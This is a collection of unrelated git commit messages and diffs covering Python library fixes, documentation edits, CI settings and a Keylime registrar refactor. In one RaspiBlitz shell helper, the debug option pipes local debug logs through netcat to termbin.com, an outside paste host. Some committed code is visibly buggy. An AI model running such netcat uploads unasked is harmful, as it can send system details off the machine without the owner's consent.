@@ -47,6 +47,7 @@ class SubprocessServiceManager(ServiceManager): shutdownTimeout=None, logLevelName="INFO", metricUpdateInterval=2.0 ): + self.cleanupLock = threading.Lock() self.host = host self.port = port self.storageDir = storageDir @@ -149,22 +150,33 @@ class SubprocessServiceManager(ServiceManager): self.serviceProcesses = {} def cleanup(self): - for identity, workerProcess in list(self.serviceProcesses.items()): + with self.cleanupLock: + with self.lock: + toCheck = list(self.serviceProcesses.items()) + + for identity, workerProcess in toCheck: if workerProcess.poll() is not None: workerProcess.wait() + with self.lock: + if identity in self.serviceProcesses: del self.serviceProcesses[identity] + with self.lock: + toCheck = list(self.serviceProcesses.items()) + with self.db.view(): - for identity in list(self.serviceProcesses): + for identity, workerProcess in toCheck: serviceInstance = service_schema.ServiceInstance.fromIdentity(identity) if (not serviceInstance.exists() or (serviceInstance.shouldShutdown and time.time() - serviceInstance.shutdownTimestamp > self.shutdownTimeout)): - workerProcess = self.serviceProcesses.get(identity) if workerProcess: workerProcess.terminate() workerProcess.wait() + + with self.lock: + if identity in self.serviceProcesses: del self.serviceProcesses[identity] self.cleanupOldLogfiles()
admin server: test that "GET /admin" gets to the admin app This excercises
@@ -60,3 +60,18 @@ def test_get(test_client, url, mimetype, is_editable): assert resp.mimetype == mimetype data = b"".join(resp.get_app_iter(flask.request.environ)).decode("utf-8") assert ("/admin/edit?" in data) == is_editable + + +def test_get_admin_does_something_useful(test_client, mocker): + # Test that GET /admin eventually gets to the admin JS app + # See https://github.com/lektor/lektor/issues/1043 + render_template = mocker.patch( + "lektor.admin.modules.dash.render_template", + return_value="RENDERED", + ) + resp = test_client.get("/admin", follow_redirects=True) + assert resp.status_code == 200 + assert resp.get_data(as_text=True) == render_template.return_value + assert render_template.mock_calls == [ + mocker.call("dash.html", lektor_config=mocker.ANY), + ]
hide software version in sidebar RTD uses weird versions, so we handle this ourselves
@@ -95,10 +95,9 @@ body { text-decoration: none; } -/* software version in sidebar */ +/* hide software version in sidebar */ .wy-side-nav-search > div.version { - color: #D63E29; - font-size: 90%; + font-size: 0; } .wy-breadcrumbs {
fixed LogSigmoid math string that wasn't rendering in documentation Summary: The documentation for LogSigmoid says: > Applies the element-wise function: > \<blank\> Now the documentation properly displays the math string. Pull Request resolved:
@@ -559,7 +559,8 @@ class LeakyReLU(Module): class LogSigmoid(Module): r"""Applies the element-wise function: - .. math:`\text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right)` + .. math:: + \text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right) Shape: - Input: :math:`(N, *)` where `*` means, any number of additional
llvm: Use full component name for function name This includes component type for named components.
@@ -1182,7 +1182,7 @@ class Component(object, metaclass=ComponentsMeta): ctx.get_input_struct_type(self).as_pointer(), ctx.get_output_struct_type(self).as_pointer())) - func_name = ctx.get_unique_name(self.name) + func_name = ctx.get_unique_name(str(self)) llvm_func = pnlvm.ir.Function(ctx.module, func_ty, name=func_name) llvm_func.attributes.add('argmemonly') llvm_func.attributes.add('alwaysinline')
fix request verification add descriptions & outputs
@@ -685,7 +685,7 @@ script: return replaceInTemplates(currentCommand.template, args); } - function sendRequest(tmpl, reqArgs, resStatus) { + function sendRequest(tmpl, reqArgs, resStatusPath) { var readyBody = replaceInTemplates(tmpl, reqArgs); var httpParams = { Method: 'POST', @@ -702,15 +702,17 @@ script: if (res.StatusCode < 200 || res.StatusCode >= 300) { throw 'Got status code ' + res.StatusCode + ' from EWS with body ' + res.Body + ' with headers ' + JSON.stringify(res.Headers); } - resStatus = dq(raw, currentCommand.resStatus); + var bdy = res.Body.replace(/&#x.*?;/g, ""); + var raw = JSON.parse(x2j(bdy)); + + var resStatus = dq(raw, resStatusPath); if (!Array.isArray(resStatus)) { resStatus = [resStatus]; } if (resStatus[0] !== 'Success') { throw 'Got EWS error ' + resStatus + ' from EWS with body ' + res.Body + ' with headers ' + JSON.stringify(res.Headers); } - var bdy = res.Body.replace(/&#x.*?;/g, ""); - var raw = JSON.parse(x2j(bdy)); + return raw; } @@ -1187,6 +1189,8 @@ script: - name: max-entries-returned description: Stop querying after specified number is reached outputs: + - contextPath: EWS.SearchItems.ID + description: Mail ID - contextPath: EWS.SearchItems.Created description: Time where the element was created - contextPath: EWS.SearchItems.Sent @@ -1237,6 +1241,7 @@ script: description: Searchable mail display name - contextPath: EWS.Mailboxes.ReferenceId description: Reference ID of the mail box, for further use on other ews queries + description: Retrieve a list of mailboxes that could be searched - name: ews-search-mailboxes arguments: - name: filter @@ -1286,6 +1291,21 @@ script: - name: ews-find-folders arguments: - name: target-mailbox + description: The mailbox to search in + outputs: + - contextPath: EWS.Folders.ChildFolderCount + description: Folder child folder count + - contextPath: EWS.Folders.DisplayName + description: Folder display name + - contextPath: EWS.Folders.TotalCount + description: Folder total count + - contextPath: EWS.Folders.UnreadCount + description: Folder unread count + - contextPath: EWS.Folders.FolderID.ID + description: Folder id + - contextPath: EWS.Folders.FolderID.ChangeKey + description: Folder change key + description: Get all folder from a mailbox located under the root folder - name: ews-get-attachment-item arguments: - name: attachment-id
hide_alexa_from_mp * hide_alexa_from_mp pack integration is deprecated, no need to have the pack in the mp * Update pack_metadata.json add comma
"name": "Alexa Rank Indicator (Deprecated)", "description": "Deprecated. Vendor has declared end of life for this product. No available replacement.", "support": "xsoar", + "hidden": true, "currentVersion": "2.0.23", "author": "Cortex XSOAR", "url": "https://www.paloaltonetworks.com/cortex",
Fix handling of embedded shared libs on Windows TN:
@@ -40,13 +40,39 @@ _so_ext = { 'darwin': 'dylib', }.get(sys.platform, 'so') +# Loading the shared library here is quite involved as we want to support +# Python packages that embed all the required shared libraries: if we can +# find the shared library in the package directory, import it from there +# directly. + +# Directory that contains this __init__.py module _self_path = os.path.dirname(os.path.abspath(__file__)) + +# Base and full names for the shared library to load. Full name assumes the +# shared lib is in the package directory. _c_lib_name = 'lib${c_api.shared_object_basename}.{}'.format(_so_ext) _c_lib_path = os.path.join(_self_path, _c_lib_name) -if not os.path.exists(_c_lib_path): + +# If we can find the shared lirbray in the package directory, load it from +# here, otherwise let the dynamic loader find it in the environment. On +# Windows, there is no RPATH trick, so we need to temporarily alter the PATH +# environment variable in order to import the whole closure of DLLs. +_old_env_path = None +if os.path.exists(_c_lib_path): + if sys.platform == 'win32': + _old_env_path = os.environ['PATH'] + os.environ['PATH'] = '{}{}{}'.format(_self_path, os.path.pathsep, + os.environ['PATH']) +else: _c_lib_path = _c_lib_name + +# Finally load the library _c_lib = ctypes.cdll.LoadLibrary(_c_lib_path) +# Restore the PATH environment variable if we altered it +if _old_env_path is not None: + os.environ['PATH'] = _old_env_path + def _import_func(name, argtypes, restype, exc_wrap=True): """
fix AI-PEP path error Summary: Pull Request resolved: as title
@@ -3,14 +3,11 @@ from __future__ import division from __future__ import print_function from __future__ import unicode_literals -import importlib -import os from benchmarks.operator_benchmark import benchmark_runner +from benchmarks.operator_benchmark.ops import ( # noqa + add_test, # noqa + matmul_test) # noqa + if __name__ == "__main__": - # TODO: current way of importing other tests are fragile, so we need to have a robust way - for module in os.listdir(os.path.dirname(__file__)): - if module == '__init__.py' or not module.endswith('_test.py'): - continue - importlib.import_module("benchmarks.operator_benchmark.ops." + module[:-3]) benchmark_runner.main()
Add __repr__, __eq__, and example() to point mass This commit adds the following methods to PointMass class: * __repr__ - representative method; * __eq__ - comparasion method; * point_mass_example() - to run some doctests.
@@ -26,6 +26,8 @@ class PointMass(Element): Mass for the element on the x direction. my: float, optional Mass for the element on the y direction. + tag: str + A tag to name the element Examples -------- @@ -54,6 +56,51 @@ class PointMass(Element): def __hash__(self): return hash(self.tag) + def __eq__(self, other): + """This function allows point mass elements to be compared. + Parameters + ---------- + other : obj + parameter for comparasion + + Returns + ------- + True if other is equal to the reference parameter. + False if not. + + Example + ------- + >>> pointmass1 = point_mass_example() + >>> pointmass2 = point_mass_example() + >>> pointmass1 == pointmass2 + True + """ + if self.__dict__ == other.__dict__: + return True + else: + return False + + def __repr__(self): + """This function returns a string representation of a point mass + element. + Parameters + ---------- + + Returns + ------- + A string representation of a bearing object. + Examples + -------- + >>> point_mass = point_mass_example() + >>> point_mass + PointMass(n=0, mx=1.0, my=2.0, tag='pointmass') + """ + return ( + f"{self.__class__.__name__}" + f"(n={self.n}, mx={self.mx:{0}.{5}}," + f" my={self.my:{0}.{5}}, tag={self.tag!r})" + ) + def M(self): """Mass matrix.""" mx = self.mx @@ -191,3 +238,28 @@ class PointMass(Element): hover.mode = "mouse" return hover + + +def point_mass_example(): + """This function returns an instance of a simple point mass. + The purpose is to make available a simple model + so that doctest can be written using it. + + Parameters + ---------- + + Returns + ------- + An instance of a point mass object. + + Examples + -------- + >>> pointmass = point_mass_example() + >>> pointmass.mx + 1.0 + """ + n = 0 + mx = 1.0 + my = 2.0 + point_mass = PointMass(n=n, mx=mx, my=my, tag="pointmass") + return point_mass
fix: check parts length before get match fix bugs which cause cannot modify field `type` etc.
@@ -264,7 +264,7 @@ def update(_doc_cls=None, **update): op = operator_map.get(op, op) match = None - if parts[-1] in COMPARISON_OPERATORS: + if len(parts) > 1 and parts[-1] in COMPARISON_OPERATORS: match = parts.pop() # Allow to escape operator-like field name by __
Update README.md Update badges with new data location at
@@ -18,9 +18,9 @@ Click here to [![badge](https://img.shields.io/badge/launch-Pangeo%20binder-579A ![Profile count](https://img.shields.io/endpoint?label=Number%20of%20Argo%20profiles%3A&style=social&url=https%3A%2F%2Fmap.argo-france.fr%2Fdata%2FARGOFULL.json) -![Erddap status](https://img.shields.io/endpoint?url=https%3A%2F%2Fraw.githubusercontent.com%2Feuroargodev%2Fargopy%2Fapi-status%2Fargopy%2Fassets%2Fargopy_api_status_erddap.json) +![Erddap status](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/euroargodev/argopy-status/master/argopy_api_status_erddap.json) -![Argovis status](https://img.shields.io/endpoint?url=https%3A%2F%2Fraw.githubusercontent.com%2Feuroargodev%2Fargopy%2Fapi-status%2Fargopy%2Fassets%2Fargopy_api_status_argovis.json) +![Argovis status](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/euroargodev/argopy-status/master/argopy_api_status_argovis.json) ## Install
Update Browser-2.1.0.rst Fix mistyped word.
@@ -42,7 +42,7 @@ Most important enhancements Use Playwright video to allow recording video of the test execution. (`#148`_) ------------------------------------------------------------------------------ Playwright has supported creating video for few releases. Now the library has been -enhanced to support videa creation in New Context keyword. If video is enabled in +enhanced to support video creation in New Context keyword. If video is enabled in the context, new page will create a video. Improve library logging when waiting. (`#491`_)
Breaking changes in plotting to make interface cleaner Instead of specifying x axis in plot1d, now specify (optionally) the overlay axis. Makes the interface more like plotgrid.
@@ -534,6 +534,9 @@ class Hist(object): def sparse_axes(self): return [ax for ax in self._axes if isinstance(ax, SparseAxis)] + def sparse_nbins(self): + return len(self._sumw) + def _idense(self, axis): return self.dense_axes().index(axis)
Updated installation process added step to include conda-forge channel
@@ -10,6 +10,11 @@ After Anaconda has been installed, open up the terminal (Unix) or Anaconda promp conda create --name nilmtk-env ``` +2. Add conda-forge to list of channels to be searched for packages. + ```bash + conda config --add channels conda-forge + ``` + 2. Activate the new *nilmtk-env* environment. ```bash
Remove python36 windows environment from core in GA Github actions doesn't support python36 environment for windows anymore.
@@ -26,7 +26,7 @@ jobs: fail-fast: false matrix: name: [ - "windows-py36", + # "windows-py36", no support anymore for the package "windows-py37", "windows-py38", "windows-py39", @@ -43,9 +43,6 @@ jobs: ] include: - - name: "windows-py36" - python: "3.6" - os: windows-latest - name: "windows-py37" python: "3.7" os: windows-latest @@ -67,9 +64,6 @@ jobs: - name: "ubuntu-py39" python: "3.9" os: ubuntu-latest - # - name: "macos-py36" - # python: "3.6" - # os: macos-latest - name: "macos-py37" python: "3.7" os: macos-latest
Add a note about non-included custom mappings [#OSF-8559]
<ul> <li>custom name: the new name for the subject</li> <li>custom parent: the parent of the subject. Leave blank if it is a toplevel subject. - *Note*: if adding a new child of an existing bepress parent, you must also add a 'custom' parent with the same name that maps to the existing - bepress subject. See JSON below for an example. + *Note*: if adding a new child of an existing bepress parent that hasn't already been included, you must also add a 'custom' parent with the same name that maps to the existing + bepress subject. See JSON below for an example. This is only necessary because "Engineering" wasn't explicitly included. </li> <li>bepress: the existing subject that you would like to repalce with the subject listed in the custom name field.</li> </ul>
Fix sac_agent debug summary bug w/ entropy. SAC is usually used with a TransformedDistribution for the actor distribution, which does not have an analytic entropy.
@@ -438,9 +438,12 @@ class SacAgent(tf_agent.TFAgent): elif isinstance(action_distribution, tfp.distributions.Categorical): common.generate_tensor_summaries( 'act_mode', action_distribution.mode(), self.train_step_counter) - common.generate_tensor_summaries('entropy_raw_action', + try: + common.generate_tensor_summaries('entropy_action', action_distribution.entropy(), self.train_step_counter) + except NotImplementedError: + pass # Some distributions do not have an analytic entropy. return actor_loss
Change K calculation Change K calculation as proposed by HaukeWittich in
@@ -750,7 +750,7 @@ class ShaftElement(Element): [L*k8, 0, 0, L**2*k9, -L*k8, 0, 0, L**2*k9], ]) - K = E * Ie_l / (105 * L ** 3 * (1 + phi) ** 2) * (K1 + 105 * phi * K2 * A / A_l) + K = E * L**(-3) * (1 + phi)**(-2) * (K1 * Ie_l/105 + K2 * self.Ie * phi * A_l / A) # axial force k10 = 36 + 60 * phi + 30 * phi ** 2
Fix the git URL regex which may incorrectly match a Windows path as git URL E.g. c:/temp/pytest-of-Screamer/pytest-8/test_import_after_add_git1_0/test3.git
@@ -105,7 +105,7 @@ regex_local_ref = r'^([\w.+-][\w./+-]*?)/?(?:#(.*))?$' regex_url_ref = r'^(.*/([\w.+-]+)(?:\.\w+)?)/?(?:#(.*))?$' # git url (no #rev) -regex_git_url = r'^(git\://|ssh\://|https?\://|)(([^/:@]+)(\:([^/:@]+))?@)?([^/:]+)[:/](.+?)(\.git|\/?)$' +regex_git_url = r'^(git\://|ssh\://|https?\://|)(([^/:@]+)(\:([^/:@]+))?@)?([^/:]{3,})[:/](.+?)(\.git|\/?)$' # hg url (no #rev) regex_hg_url = r'^(file|ssh|https?)://([^/:]+)/([^/]+)/?([^/]+?)?$'
uart_common: fix a typo Transmitted -> Transmitter
Enabled: [1, "IDLE interrupt enabled"] TE: Disabled: [0, "Transmitter disabled"] - Enabled: [1, "Transmitted enabled"] + Enabled: [1, "Transmitter enabled"] RE: Disabled: [0, "Receiver disabled"] Enabled: [1, "Receiver enabled"]
Add comment about adding ':' characters into AAAA records read from TinyDNS files
@@ -47,6 +47,12 @@ class TinyDnsBaseSource(BaseSource): } def _data_for_AAAA(self, _type, records): + ''' + TinyDNS files have the ipv6 address written in full, but with the + colons removed. This inserts a colon every 4th character to make + the address correct. + ''' + values = [] for record in records: values.append(u":".join(textwrap.wrap(record[0], 4)))
Update README.md EOSC-Synergy SQAaaS Software Silver Badge
[![PyPI version](https://badge.fury.io/py/udocker.svg)](https://badge.fury.io/py/udocker) [![Build Status](https://jenkins.eosc-synergy.eu/buildStatus/icon?job=indigo-dc%2Fudocker%2Fmaster)](https://jenkins.eosc-synergy.eu/job/indigo-dc/job/udocker/job/master/) +## Achievements +[![SQAaaS badge](https://github.com/EOSC-synergy/SQAaaS/raw/master/badges/badges_150x116/badge_software_silver.png)](https://api.eu.badgr.io/public/assertions/Ox7b5mTmS261hqn0BXnM8A "SQAaaS silver badge achieved") + ![logo](docs/logo-small.png) udocker is a basic user tool to execute simple docker containers in user
Update main-flow.md Tweak : fix incorrect variable name
@@ -122,7 +122,7 @@ Anytime in the future, you can reconstruct your data NFT as an object in Python, from ocean_lib.models.data_nft import DataNFT config = <like shown elsewhere in READMEs> data_nft_address = <what you wrote down previously> -data_nft = DataNFT(config, datatoken_address) +data_nft = DataNFT(config, data_nft_address) ``` It's similar for Datatokens. In Python:
chore: expand range to allow 2.x versions api-core, cloud-core, and resumable-media wil all be releasing Python3-only 2.x versions shortly. Closes
@@ -30,10 +30,10 @@ description = "Google BigQuery API client library" release_status = "Development Status :: 5 - Production/Stable" dependencies = [ "grpcio >= 1.38.1, < 2.0dev", # https://github.com/googleapis/python-bigquery/issues/695 - "google-api-core[grpc] >= 1.29.0, < 2.0.0dev", + "google-api-core[grpc] >= 1.29.0, < 3.0.0dev", "proto-plus >= 1.10.0", - "google-cloud-core >= 1.4.1, < 2.0dev", - "google-resumable-media >= 0.6.0, < 2.0dev", + "google-cloud-core >= 1.4.1, < 3.0dev", + "google-resumable-media >= 0.6.0, < 3.0dev", "packaging >= 14.3", "protobuf >= 3.12.0", "requests >= 2.18.0, < 3.0.0dev",
Update `pacman.py` Use widget to store parameters instead of using private variables.
@@ -12,53 +12,49 @@ import bumblebee.input import bumblebee.output import bumblebee.engine +#list of repositories the last one sould always be other +repos = ["community", "core", "extra", "other"] + class Module(bumblebee.engine.Module): def __init__(self, engine, config): super(Module, self).__init__(engine, config, bumblebee.output.Widget(full_text=self.updates) ) self._count = 0 - self._out = "" def updates(self, widget): - return self._out + return '/'.join(map(lambda x: str(widget.get(x,0)), repos)) def update(self, widgets): path = os.path.dirname(os.path.abspath(__file__)) if self._count == 0: - self._out = "?/?/?/?" try: result = bumblebee.util.execute("{}/../../bin/pacman-updates".format(path)) - self._community = 0 - self._core = 0 - self._extra = 0 - self._other = 0 + + count = len(repos)*[0] for line in result.splitlines(): if line.startswith("http"): - if "community" in line: - self._community += 1 - continue - if "core" in line: - self._core += 1; - continue - if "extra" in line: - self._extra += 1 - continue - self._other += 1 - self._out = str(self._core)+"/"+str(self._extra)+"/"+str(self._community)+"/"+str(self._other) - except RuntimeError: - self._out = "?/?/?/?" + for i in range(len(repos)-1): + if "/" + repos[i] + "/" in line: + count[i] += 1 + break + else: + result[-1] += 1 + + for i in range(len(repos)): + widgets[0].set(repos[i], count[i]) + + except BaseException as a: + raise a # TODO: improve this waiting mechanism a bit self._count += 1 self._count = 0 if self._count > 300 else self._count - def sumUpdates(self): - return self._core + self._community + self._extra + self._other - def state(self, widget): - if self.sumUpdates() > 0: + sumUpdates = sum(map(lambda x: widget.get(x,0), repos)) + if sumUpdates > 0: return "critical" # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
SR-IOV: remove ml2_conf_sriov.ini from manual Before the doc-migration I proposed this patch: The following patch removed the ml2_conf_sriov.ini file: In order to reduce confusion, lets remove the reference to it.
@@ -271,15 +271,14 @@ Configure neutron-server (Controller) mechanism_drivers = openvswitch,sriovnicswitch -#. Add the ``ml2_conf_sriov.ini`` file as parameter to the ``neutron-server`` +#. Add the ``plugin.ini`` file as a parameter to the ``neutron-server`` service. Edit the appropriate initialization script to configure the - ``neutron-server`` service to load the SR-IOV configuration file: + ``neutron-server`` service to load the plugin configuration file: .. code-block:: bash --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugin.ini - --config-file /etc/neutron/plugins/ml2/ml2_conf_sriov.ini #. Restart the ``neutron-server`` service.
refactor(chunks): change tostring to tobytes tostring is deprecated
@@ -151,7 +151,7 @@ def encode_compressed_segmentation_pure_python(subvol, block_size): return csegpy.encode_chunk(subvol.T, block_size=block_size) def encode_raw(subvol): - return subvol.tostring('F') + return subvol.tobytes('F') def encode_kempressed(subvol): data = 2.0 + np.swapaxes(subvol, 2,3)
[OTX-CI] extend timeout setting for the pre-merge test to 600 minutes from 360 minutes
@@ -21,7 +21,7 @@ jobs: runs-on: [self-hosted, linux, x64] steps: - name: Checkout repository - uses: actions/checkout@v2 + uses: actions/checkout@v3 - name: Install dependencies run: python -m pip install tox - name: Code Quality Checks @@ -29,10 +29,11 @@ jobs: Pre-Merge-Tests: runs-on: [self-hosted, linux, x64] needs: Code-Quality-Checks + timeout-minutes: 600 if: github.event.pull_request.draft == false steps: - name: Checkout repository - uses: actions/checkout@v2 + uses: actions/checkout@v3 - name: Install dependencies run: python -m pip install tox - name: Pre-Merge Tests
Fix - Harmony - unable to change workfile It was failing on Mac with OSError 9 Bad file descriptor and 48 Address already in use.
@@ -40,6 +40,7 @@ class Server(threading.Thread): # Create a TCP/IP socket self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Bind the socket to the port server_address = ("127.0.0.1", port) @@ -91,7 +92,13 @@ class Server(threading.Thread): self.log.info("wait ttt") # Receive the data in small chunks and retransmit it request = None + try: header = self.connection.recv(10) + except OSError: + # could happen on MacOS + self.log.info("") + break + if len(header) == 0: # null data received, socket is closing. self.log.info(f"[{self.timestamp()}] Connection closing.")
print debug logs Blitz help menu print debug logs fully and link option. Raspiblitz help menu
# SHORTCUT COMMANDS you can call as user 'admin' from terminal -# command: raspiblitz -# calls the the raspiblitz mainmenu (legacy) -function raspiblitz() { +# command: blitz +# calls the the raspiblitz mainmenu (shortcut) +function blitz() { +if [ $# -eq 0 ] || [ "$1" = "-h" ] || [ "$1" = "-help" ] || [ "$1" = "--help" ] || [ "$1" = "help" ] ; then + echo "_commands.sh" + echo "Usage: command [options]" + echo "" + echo "Blitz commands are consolidated here." + echo "" + echo "Menu access:" + echo " raspiblitz menu" + echo " menu menu" + echo " bash menu" + echo " repair menu > repair" + echo "" + echo "Checks:" + echo " status informational Blitz status screen" + echo " sourcemode copy blockchain source modus" + echo " check check if Blitz configuration files are correct" + echo " debug print debug logs" + echo " debug -l print debug logs with bin link" + echo " patch sync scripts with latest set github and branch" + echo " github jumping directly into the options to change branch/repo/pr" + echo "" + echo "Power:" + echo " restart restart the node" + echo " off shutdown the node" + echo "" + echo "Display:" + echo " hdmi switch video output to HDMI" + echo " lcd switch video output to LCD" + echo " headless switch video output to HEADLESS" + echo "" + echo "BTC tx:" + echo " torthistx broadcast transaction through Tor to Blockstreams API and into the network" + echo " gettx retrieve transaction from mempool or blockchain and print as JSON" + echo " watchtx retrieve transaction from mempool or blockchain until certain confirmation target" + echo "" + echo "LND:" + echo " balance your satoshi balance" + echo " channels your lightning channels" + echo " fwdreport show forwarding report" + echo " manage command line tool for advanced channel management of an LND" + echo "" + echo "Users:" + echo " bos Balance of Satoshis" + echo " lit Lightning Terminal" + echo " pyblock PyBlock" + echo " chantools ChanTools" + echo " jm JoinMarket" + echo " faraday Faraday" + echo " loop Loop" + echo " pool Pool" + echo "" + echo " Extras:" + echo " whitepaper download the whitepaper from the blockchain to /home/admin/bitcoin.pdf" + echo " notifyme wrapper for blitz.notify.sh that will send a notification using the configured method and settings" + else cd /home/admin ./00raspiblitz.sh } -# command: blitz -# calls the the raspiblitz mainmenu (shortcut) -function blitz() { +# command: raspiblitz +# calls the the raspiblitz mainmenu (legacy) +function raspiblitz() { cd /home/admin ./00raspiblitz.sh } @@ -44,7 +99,12 @@ function check() { # command: debug function debug() { cd /home/admin - ./XXdebugLogs.sh + echo "Printing debug logs. Be patient, this should take maximum 2 minutes ..." + if [[ $1 = "-l" ]]; then + ./XXdebugLogs.sh > /var/cache/raspiblitz/debug.log && cat /var/cache/raspiblitz/debug.log | nc termbin.com 9999 + else + ./XXdebugLogs.sh > /var/cache/raspiblitz/debug.log && cat /var/cache/raspiblitz/debug.log + fi } # command: patch
Add Breaking Bad Quotes under Video section remove API from description
@@ -759,6 +759,7 @@ API | Description | Auth | HTTPS | CORS | Link | API | Description | Auth | HTTPS | CORS | Link | |---|---|---|---|---|---| | An API of Ice And Fire | Game Of Thrones API | No | Yes | Unknown | [Go!](https://anapioficeandfire.com/) | +| Breaking Bad Quotes | Some Breaking Bad quotes | No | Yes | Unknown | [Go!](https://github.com/shevabam/breaking-bad-quotes) | | Czech Television | TV programme of Czech TV | No | No | Unknown | [Go!](http://www.ceskatelevize.cz/xml/tv-program/) | | Dailymotion | Dailymotion Developer API | `OAuth` | Yes | Unknown | [Go!](https://developer.dailymotion.com/) | | Open Movie Database | Movie information | `apiKey` | Yes | Unknown | [Go!](http://www.omdbapi.com/) |
EnvBindExpr: switch to ComputingExpr TN:
@@ -10,8 +10,8 @@ from langkit.compiled_types import ( ) from langkit.diagnostics import check_source_language from langkit.expressions.base import ( - AbstractVariable, AbstractExpression, BasicExpr, CallExpr, FieldAccessExpr, - GetSymbol, LiteralExpr, NullExpr, PropertyDef, ResolvedExpression, Self, + AbstractVariable, AbstractExpression, BasicExpr, CallExpr, ComputingExpr, + FieldAccessExpr, GetSymbol, LiteralExpr, NullExpr, PropertyDef, Self, auto_attr, auto_attr_custom, construct ) from langkit.expressions.utils import array_aggr, assign_var @@ -173,16 +173,15 @@ def env_get(self, env_expr, symbol_expr, resolve_unique=False, T.root_node.entity().array_type()) -class EnvBindExpr(ResolvedExpression): +class EnvBindExpr(ComputingExpr): def __init__(self, env_expr, to_eval_expr, abstract_expr=None): self.to_eval_expr = to_eval_expr self.env_expr = env_expr - - # Declare a variable that will hold the value of the - # bound environment. self.static_type = self.to_eval_expr.type - self.env_var = PropertyDef.get().vars.create("New_Env", + + # Declare a variable that will hold the value of the bound environment + self.env_var = PropertyDef.get().vars.create('Bound_Env', LexicalEnvType) super(EnvBindExpr, self).__init__('Env_Bind_Result', @@ -211,9 +210,6 @@ class EnvBindExpr(ResolvedExpression): return '\n'.join(result) - def _render_expr(self): - return self.result_var.name - @property def subexprs(self): return {'env': self.env_expr, 'expr': self.to_eval_expr}
TST: revert breaking change to test Clearly I missed something here.
@@ -104,7 +104,11 @@ class CannedModelsTest(TestCase): """name attribute matches model name""" for model_name in models: model = get_model(model_name) + if model.name != model_name: self.assertTrue(model.name.startswith(model_name)) + else: + self.assertEqual(model.name, model_name) + def get_sample_model_types(mod_type=None):
Allow passing of encoding-type for s3 get_bucket_versions without throwing error. This was a change made in
@@ -764,7 +764,7 @@ class S3Backend(BaseBackend): prefix=''): bucket = self.get_bucket(bucket_name) - if any((delimiter, encoding_type, key_marker, version_id_marker)): + if any((delimiter, key_marker, version_id_marker)): raise NotImplementedError( "Called get_bucket_versions with some of delimiter, encoding_type, key_marker, version_id_marker")
try optimize=True with einsum closes can revert if this ends up problematic for some reason!
@@ -2558,7 +2558,7 @@ def tensordot(a, b, axes=2, precision=None): @_wraps(onp.einsum, lax_description=_PRECISION_DOC) def einsum(*operands, **kwargs): - optimize = kwargs.pop('optimize', 'auto') + optimize = kwargs.pop('optimize', True) optimize = 'greedy' if optimize is True else optimize precision = kwargs.pop('precision', None) if kwargs:
Update README.md Add Age/Gender
@@ -20,6 +20,12 @@ This example shows how to do Subpixel, LR-Check or Extended Disparity, and also ![image](https://user-images.githubusercontent.com/32992551/99454609-e59eaa00-28e3-11eb-8858-e82fd8e6eaac.png) ![image](https://user-images.githubusercontent.com/32992551/99454680-fea75b00-28e3-11eb-80bc-2004016d75e2.png) +## [Gen2] Age Gender ([here](https://github.com/luxonis/depthai-experiments/tree/master/gen2-age-gender#gen2-age--gender-recognition)) + +This shows a simple two-stage neural inference example, doing face detection and then age/gender estimation based on the face. + +[![Gen2 Age & Gender recognition](https://user-images.githubusercontent.com/5244214/106005496-954a8200-60b4-11eb-923e-b84df9de9fff.gif)](https://www.youtube.com/watch?v=PwnVrPaF-vs "Age/Gender recognition on DepthAI") + ## [Gen2] Text Detection + Optical Character Recognition (OCR) Pipeline ([here](https://github.com/luxonis/depthai-experiments/tree/master/gen2-ocr#gen2-text-detection--optical-character-recognition-ocr-pipeline)) This pipeline implements text detection (EAST) followed by optical character recognition of the detected text.
registrar: cleanup start function Removed busy waiting for the threads and removed abstractions for starting and stopping threads/servers.
@@ -8,7 +8,6 @@ import ipaddress import threading import sys import signal -import time import http.server from http.server import HTTPServer, BaseHTTPRequestHandler from socketserver import ThreadingMixIn @@ -485,52 +484,40 @@ class RegistrarServer(ThreadingMixIn, HTTPServer): http.server.HTTPServer.shutdown(self) -def do_shutdown(servers): - for server in servers: - server.shutdown() - - def start(host, tlsport, port): """Main method of the Registrar Server. This method is encapsulated in a function for packaging to allow it to be called as a function by an external program.""" - threads = [] - servers = [] - serveraddr = (host, tlsport) - RegistrarMain.metadata.create_all(engine, checkfirst=True) session = SessionManager().make_session(engine) try: count = session.query(RegistrarMain.agent_id).count() - except SQLAlchemyError as e: - logger.error('SQLAlchemy Error: %s', e) if count > 0: logger.info("Loaded %d public keys from database", count) + except SQLAlchemyError as e: + logger.error('SQLAlchemy Error: %s', e) - server = RegistrarServer(serveraddr, ProtectedHandler) + # Set up the protected registrar server + protected_server = RegistrarServer((host, tlsport), ProtectedHandler) context = web_util.init_mtls(section='registrar', generatedir='reg_ca', logger=logger) if context is not None: - server.socket = context.wrap_socket(server.socket, server_side=True) - thread = threading.Thread(target=server.serve_forever) - threads.append(thread) + protected_server.socket = context.wrap_socket(protected_server.socket, server_side=True) + thread_protected_server = threading.Thread(target=protected_server.serve_forever) - # start up the unprotected registrar server - serveraddr2 = (host, port) - server2 = RegistrarServer(serveraddr2, UnprotectedHandler) - thread2 = threading.Thread(target=server2.serve_forever) - threads.append(thread2) - - servers.append(server) - servers.append(server2) + # Set up the unprotected registrar server + unprotected_server = RegistrarServer((host, port), UnprotectedHandler) + thread_unprotected_server = threading.Thread(target=unprotected_server.serve_forever) logger.info('Starting Cloud Registrar Server on ports %s and %s (TLS) use <Ctrl-C> to stop', port, tlsport) keylime_api_version.log_api_versions(logger) - for thread in threads: - thread.start() + thread_protected_server.start() + thread_unprotected_server.start() def signal_handler(signum, frame): del signum, frame - do_shutdown(servers) + logger.info("Shutting down Registrar Server...") + protected_server.shutdown() + unprotected_server.shutdown() sys.exit(0) # Catch these signals. Note that a SIGKILL cannot be caught, so @@ -539,13 +526,5 @@ def start(host, tlsport, port): signal.signal(signal.SIGQUIT, signal_handler) signal.signal(signal.SIGINT, signal_handler) - # keep the main thread active, so it can process the signals and gracefully shutdown - while True: - if not any([thread.is_alive() for thread in threads]): - # All threads have stopped - break - # Some threads are still going - 